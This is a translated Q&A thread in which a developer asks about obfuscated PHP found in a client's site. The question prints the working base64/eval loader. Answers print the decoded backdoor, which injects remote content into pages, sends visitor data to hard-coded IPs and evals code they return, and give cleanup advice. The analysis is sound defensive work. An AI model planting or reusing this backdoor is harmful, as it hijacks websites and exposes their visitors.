0

不久前,我为一个遇到问题的客户建立了一个网站。进入站点文件后,我在其中一个 PHP 类的顶部发现了它:

<?php
/*ad0b18735e68b25aa9c4374221824db5_on*/ $byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb= array('8759','8776','8755','8766');$ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P= array('8569','8584','8571','8567','8586','8571','8565','8572','8587','8580','8569','8586','8575','8581','8580');$J0BQOOWj4oRnP7liN= array('7450','7449','7467','7453','7406','7404','7447','7452','7453','7451','7463','7452','7453');$UbjPmIKWlC="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVTFkMGEySkhVa1pOVjJocFZqQldjRk14VG5OT01HeEVVVzB4YTFaNlZuRmFSV1J6WkcxS2NGRnVVbWxOYkVwdFYxUkpOV1JWZEVSVmJXeHJWakZzZDFwVVRrOU5SMDV6VDFoQ2FtSldXak5aYTJSSFlXeHdWRm95YkZGU01IQXlWMnRvY2tzd2JIQmtNbXhSVWpCd01sZHJhSEpMTUd4d1pESjBXbUpzV25SVVJVNVRZVzFLZFZWdFdtaFJNbk16V1Zaa1dsb3dkRVJWYlhCcFlteEtiVmxWVGtKUFZrSlVVVmhvVEZVd1NUTlRhMlJMVFZad2NGRlViRXBUUlRSM1dUSjNOV05IVG5SV2JtUnBVakJhY1Zkc1RtNWhWa0pJVTI1YVlWTkhjM0pUVjJ3ellWWkNTRk51V21GVFIzTnlVMWRzUW1SVmJFbFVha0pxWWxkNE0xbDZTalJoUjAxNVlVZDRhbVZYWkhKWFJFWlBVbXhXYzFkcldsWmlTRTV3VjJwSk5XUnNjRVJUYlZKTVZUTmtjbGRYTlZkaVZYUlZZekprYW1KV1dYZGFSbWhMWkZWc1JGVnRiR3RXTVdzeldteG9UMDFIVG5OUFdFSnFZbFphTTFsclpFZGhiSEJVV2pKc1VWRjZiSEJaYWtwVFRsWkNjRk5ZVGtwaGJtUXlWMWN3TldFeVZsVk9SMnhOVVRGS2NGcEdaRnBqTUhCSVZHNVdhMUpxYkhaVE1WSXdZMFp3Y0ZGWE9VdFNNRFV4V2tWWk5XSXdiRVZOUkd4S1VrVldkMU5WYUhwaE1XeDFWbTB4U2xKRVFtNVplazVUWlZabmVXSkliR0ZYUlVwNlYxWmtUMkpGZEVSVFZHaE5UV3R3TWxkcmFISkxNR3h3WlVod2ExTkZjSGRaTUdoUFl6RnNXVlJ0T1dGWFJURjJVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhNV3RrYlVsNVZWZHNXVlV5ZERGVFYzQXpaR3hzZEU5WGRHeFdSRkp3VkVWT1UyRlhVbGhYV0VKUVpWVktOVmRzYUZOTlYwNTBUa2RrUzFJd2IzaFhiWEF3VDFkT2RGWnFRbXRYUlhBeFUxVk9VMkZYVWxoWFZHUnRWakZ2ZUZsdE1VOU5SMFpZVDFoV1NsSjZiRE5YVm1NeFkyMUdWRm95ZEZwaWJGcDBVekZvZW1FeGIzcGpSMXBoVlRCRk5WTlZaR0ZoUjBwSlZHMTRVR1ZXU25aWFJFb3pXakZDVkZGdE9XRldNRnB5VjJ4b1MyVnNaM2xsU0VKcVRURkdkbE14VWpCalJuQndVVmM1YUZaNlZtMVhWbWhMWlZac1dXRXlPVXBoTURVeVdXMDFVMkpIU25WVldGSlRWbnBXY1ZscVNsTmpSMHAwV1hwYVNsSXlVVEpaVm1oQ1lWVjRSRkZYZEdoU2FteDZVekZPY2xveVZqVlJWM1JoVFROQ2JWZHNUa0pQVld4SlZXNXNhMVl4VlROYWJHUnpZbFZzUkZveWRHRk5NMEp0VjJ4T2MwNHdjRWxWYmxKcVVqRndNVmRXWTNoaVJXeEZUVWRrYTFJeFdqQlpNR014WVVkS1ZGb3liRTFOTVVvd1dUQk9TbU13YkVSVGEyUlZUVVJvY0ZNeFVqQmlWMFpZWlVkNFdVMHdTWGhhUlZrMVlXMUplVTVVUW1GV2VsVjNXVE5zYm1FeVVraE5XR1JoWWxSV2IxbHNaRlpqTUd4RVZXMXNhMVl4YkhkVU0yeFRUbXh3UkZGVWJFcFNNbEV5V1dwT1EySkhTbkJhTW5SclVucEdNMWR0TURGaFIwcFlWbGhPU2xFd2NEVlRWMnh5VGpCd1NGUnVXbWxpYkVweldXMDFVMlZyYkVWTlIyUmhUVE5DTlZkc1pFZGhNSFJFVldwYVlWRXpaRzVVVmxKQ1pEQXhSVkZZWkU1U1JVWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVRWaGFZVkpxYkhGWmFra3dZakJ3U0ZSdVdtbGliRXB6V1cwMVUyVnJkRlZrUnpWc1lsVTFlbGxxVGs5aVJYUkVWV3BhWVZFeWN6TmFSbU14WXpKR1dFNVlTa3hSTVVsM1dXeG9RMkpYU25SU2JsSmhWVEp6TTFOclpFOWtiVXAxVlcxNGFXSnNTalpUVlZGM1dqRnZlbU5IZUdsaVZUVXlWMnRrVm1Jd2NFaFVibHBwWW14S2MxbHROVk5sYTNSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdGNHbE5hbFYzVjJ4ak1VMUhUalZSVkd4S1VucEdNbGRyV1RWaGJVbDVUa2M1UzFJd2IzaFhiV3h5VGpKYVZGVnVUbUZXZWxKdVZVWk9RMlZ0VWtsVGJrNWhWbnBTZGxOclpFOWtiVXAxVlcxNGFXSnNTalpUTVZJd1lqRndXRkp0ZEdGWFJXeDJVMWQwVDJSdFNuVlZiWGhwWW14R01GWkZaRmRrVm05NlZXMDVVR0ZWUm5CVVIyeFRZekZ3V0U1SVFsQk5NSEJ6V2tWb1YyVlhTbkJhTW5SYVRXcHNNVnBGWkZka1YxSkpWRmhDVUUxNlFtNVhiVFZYWkZacmVsVnVRbWxOYWxKdVZXcEtWMDFHVWxoU2JsSmFWVEprZDFwWWJGTmtSMGw2VlcwNVlWZEZiRzVWUms1Q1lWZEtXRlZ1YkdsV01WcHlXVlprUjJKdFRuUlBWRVpxVVhwV2NWbHFTWGRoVlRoNlUyMTRhMU5HV2pWWmJXeENZVEpLV0U5VVFtaFNNVm8xVkhwTmVHUnNiSE5QV0hCclVqQmFOVnBGVG01aFYwbDZVVzFvYVdKWVVuZFRWMnh5VGpGd2RWWnVWbHBOTVVwM1dXcEpNRm94YkZoaFJ6RnJWakZLZEZsclpHRk9iSEJJWVVjeGFGTkZNWFpUYTJoRFlVVjBXV015ZEdsV01Gb3dWMVpPUWs5VmJFWmFSM2hyVWxSR2IxbHNaRVppTUhSVll6SjBZV0pYZUhwWGJFNUNUMVZzU1ZadWJHbFNNVm94VjFSSk5XRXhjRlJoUjFwWlRVWndTMVpGVmxkYWJHZzFZWHBrYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQzWVVaQ1ZrMVdSbkJYUms1eVkwZFdOVlZ0T1dsTk1EUjNVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4eVlVWldWMUpyU20xVk1GVTFWa1phUkZOdFVsQk5la0p1VjJ4a05HVnNjRlJSYW1STFVqSm9NbGw2VGxKYU1VSlVVVmRzU21GdVVUVlpWbVJhV2pCMFNHSkljR3BOYkZsM1V6Qk9VMXBzVlhkV2JFNVhZVEZhVkZZemJFdFZNVXBXVFZaQ1YxSldXbTFWVmxaVFVsWldjRk50VWt4Vk1uY3pVMnRrYzJRd2JFVk5SMlJMVW1wc1ZWVnNXa3RXTVVwWFUyMUtTbUpGY0VkV1JsVTFWbFpLVjA5VlNsTlNWa3BVVTFkM2QwNHlXbFJSYlhocFUwVTFjMU5WYUhwaE1rWlpVVmRrVVZVd1JuQlRWM0F3VDFkR1dGZFhaRXhTTW5nMldYcEtWMDFGZEVSVmJWcFdUVVphVkZadGRGZFZNV1ExVTJ0c1YxSnNTbEpYUkVaTFVteEtjbFpzVGxOV2EyeHdWMFpPY21OSFZqVlZibXhoVmpGc2JsVkdUa05OVjA1MFpVZDRhV0pWTlRKWGEyUldZakJ3UjA5V1VsTldhM0JZVld4YVMxbHJiSEpoUmxaWFVtdEtiVlpYZEZkU01VcFhVMnRhVm1GVmNHdFRNVkl3VDFWc1NGWnVUbXBOYkZadVdsaHNVMlZXY0ZoWFYyUlJWVEJHY0ZOWGNEQlBWMFpZVjFka1RGSXllRFpaZWtwWFRVVjBSRlZ0V2xaTlJscFVWbTEwVjFVeFpEVlRhMnhYVW14S1VsZEVSbGRXUmtwWFUyMWFVbFpYVWtkV1IzaFNZVlpvVkdFelFteGxWa2w0VjFaT1FrOVZiRWxXYm14cFVqRmFNVmRVU1RWaE1YQlVZVWh3YTFORmIzZFpha28wWkcxUmVWWnViRXhSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQ0Vm14U1UxWnJjRzFWVmxaclVteFNjMVZYYkZsVk1uUjNWSHBOZDFveGNGaGxTSEJoVlRCSk0xTnJhRmRoUld4RlRVZGtTbUZWYXpOYWJHUnpZbFZzUkdGSVFtcE5NRFZ6V2tWT2JtRXhaM2hVYTFwV1lrWndSMVpYZUhwaFZsWlhWbXRhVm1KSGVHMVdWRVpUVlRGT1ZrNVZhRXBpUkVKM1V6Rm9lbUV5VGxsVVYyUlJWVEJKZUZreU1UUmlSMHAwVkc1YVlWSXhWblpUYTFrMVZrWktWMU5zWkZOV2EzQnBVMWQ0UjFac1NsZFRiSEJaVFZVMVZsWlhkSE5VTVVvMVUyMVNURlpJVVRWVFZXUlhZekpOZVZaWFpHeGxWa28wV1ROc1FrOVZiRVJUVjJ4UVRYcENjbHBHYUV0ak1XZzJVVmRrVVZVd1JuQlpWV2hUVFVkT1JXSXpXazFsVld4dVZFZHNRbUV5VGtoU1ZHUkxVMFphTlZscldUUmxSV3hGVFVka1NtRlViSGhYYkdSVFkwVjRkVkZ0T1dwU1JHdDVWMnhvUzJWdFJsaFBXRlpSVmtWRk1WUXhVazVpVjBwWVQxUkNhRkl4V2pWVlJrNUtXakI0Y0ZWdVVscFdla1p2VTFWTk1Gb3diSEJYYlRGb1ZqTm9jMVZHVGtwYU1IaHdVVmQwWVdKWGVIcFhiRTVDWkZWc1JGTlhNV2hTZW13MldrVlJkMkZWYkVST1IyUkxVakpvTWxsNlRsSmFNSGh3VVZkc1MySlhlRE5WUms1S1dqQjRjRkZYZEdoWFJVWnVWRWRzUW1GVmNIVlRiWGhoWVdwQ2NGTlZUVEJhTUhCSlUyMTRZV0ZWUmpGVFZVNUtZbGRTV0ZKVWJFcGhWVVl4VTJ0b1YyRkZiRVJPUjJSS1lWWndORmt6YjNkaFZXeEVUa2RrUzFORldqWlVNMnhUVFVkT2RXRXlaRkZWTUVsM1dUSTFWMkpGT0hsaVJ6Rk1VVEJLZEZwR1l6RmhiVkpJWWtoYWFXSkViSE5hVldSelpXMVNTVlJYT1VwaVZUUjRXVEl4TkZwdFJsaE9XRUpyVVRCc2QxTlZUbk5PTUhCSVZHMDVTbEpFUW01WFZFNVhaVmRLUjA5WVFtbGlWM2QzVXpCT1UwMVhUblJsUjFwT1VUQkdNVk5WVGxOTlYwNTBaVWRhVGxVeWN6TlhWRTVYWlZkS1IwOVljR0ZYUmtveVdUQm9VbUl3Y0VoVWJUbE5VVEJLUlZac1drdFVWbEY0VVd4V1dVMVZjRWRXYTFwWFZURlNjMVZzVGxKV1ZGWlZWVzEwVjFVd2VFUlJXR2hNVmtoU2NWcEdhRXRqTVdkNlZHMTRhMUo2YkROYVJVNXVZVEZyZVZvelRrcFNWVFZYVmxkME5GVkdWa2RWYlZwWFVsZDRUMVZzVlRWV2JGcEVaREprVG1WWGN6TlRhMmhYWXpKU1JGRlViRXBUUmtvMVdWWmpkMkl4YTNwV2JteHBVbXBzYzFwVlpGZGhhM1JFVlcxd2FGRXlkSGRVTTJ4VFRVZE9kV0V5WkZGVk1FcDBWMVprTkdWc2NGVmtSR3hLVWpKNGRGTlZUbTVpTWtaWVRsaENXVTF0VW5OYVJVNXVZVlpzV0dWSVRtbE5NbEp0V2tab1MyTXhaM2xYYmxwcVVqRmFNVk5YYkhKalJXeEVWMWN4U2xFeFNYZFpNalZ5WTBWc1NXTXlkR3RXTTJkM1UxVlJkMW95VWtsVGJrSnBWVEpvUWxkdE1YTmpNWEJYVDFjMVlWZEdTbTFYVkVrMVpGZFNTRlp1Vm10VFJURjJVMnRvVjJWWFNrZFBTR1JLVVhwU2JsTnJhRmRsVjBwSFQwaG9URlV5Y3pOVGEyaFRaVmRXVkZGVWJFcFNNWEJ2V1d0b1QySkZPSHBOV0VKaFlWZGtjbHBGYUV0T1ZYUlpZekowWVdKclJtNVZSazVEWWxkTmVVOVhjR2hOYW13elYyeGpNR0l3Y0VsUmJXaE5VVEJGTUZSVlRqTmFNSEJJVm01c2FtSlVWakpVUlU1Q1lURndXVk51YkdwTk1VbzFWRVZPUW1Wck1VUmhlbVJvVmpGc2JsTXdUbE5pVjA1RVlUSmtiR1ZXU2pKYVJtaFNXakZDVkZGWGJGTk5SbHBXVTFWT1UwMVhUblJsUjFwT1ZUQktTbFpyV2xOVlZYZzJVbGhXVGxKdWFEVlhSV013WVZVNU5WVnVXbXRYUmtadVZFZHZkMW93YkhKaFNGcHFUVEZGTWxOVlRsTmtNV3hYWlVoc1dWSjZVbkJVTTJ4VFpHMVNXVlZYWkUxaGFrSnVVMWQwVDJSdFNuUk9WM2hhVFRGS2QxbHFTVEJPYTJ4R1ZHNU9hVTB3TlhOWFJXaExXVEpLYzJWSWJGbFNlbEp3VkhwS1lVMHlUblJpUkVKaFZUSmtjbGR0TlVKak1HeEVWVzVhYTFkR1JuZFVNMnhUWlZad1dWVlhaRkZWTUVad1UxZHdNRTB5UmtoaVNFNWhWVEJHZGxOV1pHRmlSMGw1VjFjNVMxSXhjRE5UTVU1eVdqSldOVlZ1YkdGWFJrWnVVMVZOTUU5VmJFUlJiVEZoVFd4WmQxa3piRzVoTVhCMVVWaE9TbEpGVmpWVU1FNXlUakphV0ZkdGNHbFNlbXcyVjJ4T2JtRXhjSFZSV0VKUVpWWkplRmxyYUZKYU1VSlVVV3BDYW1KWGVEQlRNR2hQVFZac2RWUnFRbXBoVjJSeVdUSXhWMDFGZUVSUmJuQnJVMFZ3TTFscVRrNWlNSEJKVTIxNGExRXpaRzVUVjNnMFpWWm9TRTVYVG1waVNHZ3hVMWRzY2xvd2REVlJWRUpNVlRKek0xcHNaM2RhTUd4SVlrY3hTbEV5YURaYVJXaExaREpKZWxSWE9VdFRSbHA2V2tWT00yRldjRmxYYldocFVUQnNkMU5WVGtaUFZrSlVVVzB4V2xZemFEWlhiRTV6VGpCd1NXSXlaRkZWTUVvMldrVm9TMk5IVGtsVWJrNWFWMFUxZGxkc2FFNWlNazE2Vlc1c1dVMHdjSE5aTUdRMFlVWnJlVlpYT1VwaVZsbDVWMVprTTJGVmVFUlRWMnhOVVRGSmVGbHJhRkpqUlhSVll6SmtZVmRHY0c5WmEwNXVZVEpXY0dGNlpFcFNNVmt3V1Zab1VtSXdkRlZrUkd4b1ZqRnNibE13YUU5TlIwNTFVVzVhYW1WWFpISmFSbVEwVFVWNFJGTnRlRnBpVkZadlUxZHNjbG93YkZWTlJHeEtVakZ3YjFscmFFOWlSWFJaWXpKMFdVMVZOVWRXVjNoaFVteFdjMk15YkdGTmFtd3lWMnRPUzFwRmJFVk5SMlJxVFRGS05WZEVUa3RpUjA1SVpVZG9XazFzVm5aVFZ6RlhZVmRLZEZKWGJFMVJNR3h3VkVWT1UwMVhTa2xWV0VKUVRUQndjMXBGYUZkbFYwcHdVV3BDYW1Kc1duTlVlazE0WWtkS1NWUnRlRXBUU0ZJMVYyeG9VMDFYVG5ST1IyUmhZbFZhZWxsNlNsWk9NbHBaVFVkMFlXSlZXWGRaVldSWFpWVXhjMlJIVWtwU1JFSnVVMWR3YWswd2VIRmFNMmhOWVd0cmQxUldUVEJsVlRWVlZGZHNVR1ZXU25SWFZtaFRZakZ3V1ZOWWJGaE5WRUp1VlVaT1FtRlZOVVZYV0ZaT1lXeEZNVlJIY0ZaT1JYaHhVbGh3VDFVd2F6TlRhMlJoWVVkU1NHRkhlR3BoYTNCcFYwWk9RazlWYkVSVFdHaFBaV3hzTVZReFRUQmxWVFZGVWxoV1RsWkdWak5UVjNCNllURndkRkpxUW1oU01WbzFWRmQ0TUZwRmJFVk5SMlJLWVd4RmVWUkhjRTVOTUhoeFVsUktVRlY2VVhoVWJXeEtUakJ3U0ZkdGFHdFNNbWh6V1RKd1MxbHNhRlJSVkd4S1VUQnJNVlJyVFRCbFZUVkZVMWhXVG1Gc1ZYaFVSM0JPVFZWc2NXTXlkR0ZpVlZsM1dWVmtWMlZWTVhOa1IxSktVa1JDYmxOWGNFWk5NRGxFVGtob1QyRnJiREZVVmxKS1RsVjRjVk5ZYkU1bFZXc3pVMnRrWVdGSFVraGhSM2hxWVd0d2FWZEdUa0pQVld4RVUxaHdUbFY2VWpSVU1GSlNaRlV4Y1ZSVVFrMWhiWE41VTFkd2VtRXhjSFJTYWtKb1VqRmFOVlJYZURCYVJXeEZUVWRrU21GdFRYcFVSM0J5VFZWNGNWSlVVazFoYTFVd1ZERk9TazR3Y0VoWGJXaHJVakpvYzFreWNFdFpiR2hVVVZSc1NsRXdhekZVV0dzd1pVVTFObEZZVms1V1JUQjZWRWR3U21WVmJIRmpNblJoWWxWWmQxbFZaRmRsVlRGelpFZFNTbEpFUW01VFYzQkdUa1U1UkU1RVFrNVJlbEV4Vkd4Tk1HVlZOVVZWVjJ4UVpWWktkRmRXYUZOaU1YQlpVMWhzV0UxVVFtNVZSazVDWVZVeFZXRjZWazFoYTFZMFZHeE5NR1ZWTVRaU1dGWlBWa2RrY0ZRemJGTmlWbXhaVlcwNVlWZEZiRFZXZWtWM1dqRkNWRkZYYkZCU1JXd3hWRlpTY21WVmVIRmFlazVOWVd0VmVsUXdUa3BPTUhCSVYyMW9hMUl5YUhOWk1uQkxXV3hvVkZGVWJFcFJNR3cxVkZaU1dtUlZNWEZWVkVwTllXMXpNVlJIY0VwbFJUVlVVMVJrUzFJeGNHOWFSV1J2WWtkT2NWTnRTbGxWTUVVMVUxVk9TazVWTlZST1NHeE9Wa1ZXTVZSV1VtNWtWVFUyWVRKc1VFMHdOWFphUm1SaFlsZEtTRlpYT1V0U01YQnZXa1ZrYjJKSFRuRlRXRUpRVFd4d01sa3lNVmRoUm10NVdqSTVTMUl4Y0c5YVJXUnZZa2RPY1ZOWFpGcFhSVEZ1VTJ0b1YyVlZkRmxrU0VKaFlWVkdkbE5WWkVkaU1YQjFWbTEwWVdKWWFIUmFWekZUWWpGd2RHRkljRXhSTVVsNFdUSnNjbG93ZEZSUmFtUktVakJ3TlZkc1pFZGphMnhGWkVSc2JWZEVRVGxKYVd0d1QzbEJQU0lwS1RzZyIpKTsg";if (!function_exists("Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ")){ function Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($fmG17jH6h8R6pfvV6ODRd6K,$iot3u6fS){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 = '';foreach($fmG17jH6h8R6pfvV6ODRd6K as $seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 .= chr($seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh - $iot3u6fS);}return $AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7;}$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6 = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb,8658);$UsopvTU00NLoC = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P,8470);$D4fUhPPUiQCBxt = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($J0BQOOWj4oRnP7liN,7352);$UCUMQ98AUYryzF0tSVyD = $UsopvTU00NLoC('$kiNmYfN',$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6.'('.$D4fUhPPUiQCBxt.'($kiNmYfN));');$UCUMQ98AUYryzF0tSVyD($UbjPmIKWlC);} /*ad0b18735e68b25aa9c4374221824db5_off*/ ?>

我不知道它是什么,也无法破译。直接在线访问文件时没有任何输出。有任何想法吗?看起来是不是恶意的?

4

4 回答 4

5

You most certainly got hacked.

I did the fun to poke into the code.

The code is base64_encoded multiple times and then eval'd. Result is:

if (!function_exists("GetMama")){  
function mod_con($buf){

str_ireplace("<body>","<body>",$buf,$cnt_h);

if ($cnt_h == 1) {

$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
 return $buf;}

str_ireplace("</body>","</body>",$buf,$cnt_h);

if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); 

return $buf;}
return $buf;}

function opanki($buf){
$gz_e = false;$h_l = headers_list();

if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}

if ($gz_e){

$tmpfname = tempnam("/tmp", "FOO");

file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");

$contents = gzread($zd, 10000000);

$contents = mod_con($contents);

gzclose($zd);

unlink($tmpfname);

$contents = gzencode($contents);} 

else {

$contents = mod_con($buf);}

$len = strlen($contents);

header("Content-Length: ".$len);

return($contents);} 

function GetMama(){
$mother = "mdrmediagroup.com";

return $mother;}

ob_start("opanki");

function ahfudflfzdhfhs($pa){

$mama = GetMama();

$file = urlencode(__FILE__);

if (isset($_SERVER["HTTP_HOST"])){

$host = $_SERVER["HTTP_HOST"];} else {

$host = "";}

if (isset($_SERVER["REMOTE_ADDR"])){

$ip = $_SERVER["REMOTE_ADDR"];} else {

$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){

$ref = urlencode($_SERVER["HTTP_REFERER"]);}

 else {

$ref = "";}

if (isset($_SERVER["HTTP_USER_AGENT"])){

$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}

 else {

$ua = "";}

if (isset($_SERVER["QUERY_STRING"])){

$qs = urlencode($_SERVER["QUERY_STRING"]);}

 else {$qs = "";}

$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;

$try = true;

if( function_exists("curl_init") ){

$ch = curl_init($url_0 . $url_1);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_TIMEOUT, 3);

$ult = trim(curl_exec($ch));

$try = false;}

 if ((ini_get("allow_url_fopen")) && $try) {

$ult = trim(@file_get_contents($url_0 . $url_1));

$try = false;}

if($try){

$fp = fsockopen($pa, 80, $errno, $errstr, 30);

if ($fp) {

$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);

$ret = "";

while (!feof($fp)) {

$ret  .=  fgets($fp, 128);}

fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));

}}  

if (strpos($ult,"eval") !== false){

$z = stripslashes(str_replace("eval","",$ult));

 eval($z);

 exit();}

if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);

return true;}

else {
return false;}}

$father2[] = "77.81.241.253";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "31.184.234.96";$father2[] = "77.95.18.189";$father2[] = "93.170.137.22";$father2[] = "188.40.95.244";$father2[] = "199.115.231.58";$father2[] = "82.192.87.178";$father2[] = "216.246.99.215";$father2[] = "95.211.18.79";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) { break ;}}}
于 2012-04-18T21:20:28.740 回答
5

如果您和您的任何开发人员都不知道它的来源,那么我猜您受到了攻击:(。立即解决方法是执行以下操作,

  1. 清理所有文件。
  2. 立即切换到安全 FTP 访问
  3. 在互联网上对这种攻击进行更多研究,看看您需要采取哪些其他措施。

您需要快速执行此操作,因为 chrome 和 FF 等浏览器会很快注意到它,并将开始向用户显示您的网站是恶意的。

于 2012-04-18T21:10:35.117 回答
2

是的,它是恶意代码,它是一组经过评估的 base64 编码的刺,结果代码是:

    <?php 
if (!function_exists("GetMama")){
    function mod_con($buf){
        str_ireplace("<body>","<body>",$buf,$cnt_h);
        if ($cnt_h == 1) {
            $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf);
            return $buf;
        }
        str_ireplace("</body>","</body>",$buf,$cnt_h);
        if ($cnt_h == 1) {
            $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf);
            return $buf;}return $buf;}function opanki($buf){
                $gz_e = false;
                $h_l = headers_list();
                if (in_array("Content-Encoding: gzip", $h_l)) {
                    $gz_e = true;
                }if ($gz_e){
                    $tmpfname = tempnam("/tmp", "FOO");
                    file_put_contents($tmpfname, $buf);
                    $zd = gzopen($tmpfname, "r");
                    $contents = gzread($zd, 10000000);
                    $contents = mod_con($contents);
                    gzclose($zd);unlink($tmpfname);
                    $contents = gzencode($contents);
                } else {$contents = mod_con($buf);}
                $len = strlen($contents);
                header("Content-Length: ".$len);
                return($contents);}
                function GetMama(){
                    $mother = "mdrmediagroup.com";
                    return $mother;}ob_start("opanki");
                    function ahfudflfzdhfhs($pa){
                        $mama = GetMama();
                        $file = urlencode(__FILE__);
                        if (isset($_SERVER["HTTP_HOST"])){
                            $host = $_SERVER["HTTP_HOST"];
                        } else {
                            $host = "";
                        }if (isset($_SERVER["REMOTE_ADDR"])){
                            $ip = $_SERVER["REMOTE_ADDR"];
                        } else {$ip = "";
                        }if (isset($_SERVER["HTTP_REFERER"])){
                            $ref = urlencode($_SERVER["HTTP_REFERER"]);
                        } else {$ref = "";}
                        if (isset($_SERVER["HTTP_USER_AGENT"])){
                            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {
                                $ua = "";
                            }if (
                            isset($_SERVER["QUERY_STRING"])){
                                $qs = urlencode($_SERVER["QUERY_STRING"]);
                            } else {$qs = "";}
                            $url_0 = "http://" . $pa;
                            $url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;
                            $try = true;
                            if( function_exists("curl_init") ){
                                $ch = curl_init($url_0 . $url_1);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                curl_setopt($ch, CURLOPT_TIMEOUT, 3);
                                $ult = trim(curl_exec($ch));
                                $try = false;
                            } if ((ini_get("allow_url_fopen")) && $try) {
                                $ult = trim(@file_get_contents($url_0 . $url_1));
                                $try = false;
                            }if($try){
                                $fp = fsockopen($pa, 80, $errno, $errstr, 30);
                                if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";
                                $out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";
                                fwrite($fp, $out);$ret = "";
                                while (!feof($fp)) {
                                    $ret  .=  fgets($fp, 128);
                                }fclose($fp);
                                $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
                                }
                            }
                            if (strpos($ult,"eval") !== false){
                                $z = stripslashes(str_replace("eval","",$ult));
                                eval($z);
                                exit();
                            }if (strpos($ult,"ebna") !== false){
                                $_SERVER["good"] = str_replace("ebna","",$ult);return true;
                            }else {return false;}}
                            $father2[] = "77.81.241.253";
                            $father2[] = "46.249.58.135";
                            $father2[] = "176.9.241.150";
                            $father2[] = "46.37.169.56";
                            $father2[] = "94.242.255.35";
                            $father2[] = "178.162.129.223";
                            $father2[] = "31.184.234.96";
                            $father2[] = "77.95.18.189";
                            $father2[] = "93.170.137.22";
                            $father2[] = "188.40.95.244";
                            $father2[] = "199.115.231.58";
                            $father2[] = "82.192.87.178";
                            $father2[] = "216.246.99.215";
                            $father2[] = "95.211.18.79";
                            shuffle($father2);
                            foreach($father2 as $ur){
                                if ( ahfudflfzdhfhs($ur) ) { break ;}
                            }
}


?>
于 2012-04-18T21:27:28.290 回答
-1

要扩展我的评论...

您是否使用 CMS(Wordpress、Joomla 等)?如果是这样,一些 3rd 方插件和主题开发人员会尝试加密他们的代码,以免被盗版......

如果您从头开始编写网站,请往下看。

你是唯一的开发者吗?

(YES) --> 你被黑了。--> 检查你的日志文件。-> 寻找不寻常的活动/黑客尝试。--> 尝试找到漏洞并修补它。--> 删除恶意代码。

(否)--> 询问其他开发人员是否将其放在那里。如果答案是否定的,请转到上述解决方案。

正如 Khan 所说,在一定程度上,时间至关重要,因为 Google 和 Web of Trust 等服务将开始将您的网站标记为恶意网站。同时,不要只删除外来代码。如果您以后设法解开它,您可能能够弄清楚它的作用以及它向谁报告-->黑客是谁。

还要查看服务器日志...如果您的服务器已被植根,那么阻止黑客入侵的唯一方法就是重新安装它。

代码是:

if (!function_exists("GetMama"))
{ 
    function mod_con($buf){
